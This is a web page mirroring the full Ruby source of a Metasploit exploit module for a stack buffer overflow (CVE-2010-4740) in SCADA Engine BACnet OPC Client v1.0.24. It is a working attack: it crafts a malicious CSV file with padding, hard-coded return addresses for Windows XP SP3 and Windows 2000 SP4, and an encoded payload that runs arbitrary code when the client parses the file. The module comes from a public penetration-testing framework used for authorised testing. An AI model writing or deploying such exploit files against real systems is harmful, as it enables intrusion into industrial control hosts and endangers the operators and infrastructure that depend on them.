Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/bacnet_csv.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'BACnet OPC Client Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in SCADA

18
          Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client

19
          parses a specially crafted csv file, arbitrary code may be

20
          executed.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [ 'Jeremy Brown', 'MC' ],

24
        'References' => [

25
          [ 'CVE', '2010-4740' ],

26
          [ 'OSVDB', '68096'],

27
          [ 'BID', '43289' ],

28
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01' ],

29
        ],

30
        'DefaultOptions' => {

31
          'EXITFUNC' => 'process',

32
        },

33
        'Payload' => {

34
          'MinNops' => 0,

35
          'MaxNops' => 0,

36
          'Space' => 698,

37
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),

38
          'StackAdjustment' => -3500,

39
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",

40
          'EncoderOptions' =>

41
                        {

42
                          'BufferRegister' => 'ECX',

43
                        },

44
        },

45
        'Platform' => 'win',

46
        'Targets' => [

47
          [ 'Windows XP SP3 English', { 'Ret' => 0x77e26323 } ],

48
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],

49
        ],

50
        'Privileged' => false,

51
        'DisclosureDate' => '2010-09-16',

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    register_options(

62
      [

63
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.csv' ]),

64
      ]

65
    )

66
  end

67


68
  def exploit

69
    csv = "OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME\n\\"

70
    csv << rand_text_alpha_upper(185)

71
    csv << [target.ret].pack('V') + rand_text_alpha_upper(4)

72
    csv << payload.encoded + rand_text_alpha_upper(750 - payload.encoded.length)

73
    csv << "\\scada,0,0,\n"

74


75
    print_status("Creating '#{datastore['FILENAME']}' file ...")

76


77
    file_create(csv)

78
  end

79
end

80


81